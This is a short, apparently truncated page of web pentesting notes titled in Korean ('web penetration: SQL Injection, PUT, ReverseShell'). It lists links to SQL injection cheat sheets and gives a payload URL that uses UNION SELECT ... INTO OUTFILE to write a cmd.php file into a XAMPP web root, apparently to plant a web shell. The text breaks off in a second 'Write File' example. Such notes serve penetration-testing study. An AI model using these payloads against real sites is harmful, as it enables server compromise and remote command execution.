웹 침투 (SQL Injection, PUT, ReverseShell)
Manual SQL Injection Cheat sheet http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet https://sushant747.gitbooks.io/total-oscp-guide/sql-injections.html https://guide.offsecnewbie.com/5-sql Load File http://example.com/photoalbum.php?id=1 union all select 1,2,3,4,"",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php' Write File http://example.com/photoalbum.php?id=1 uni..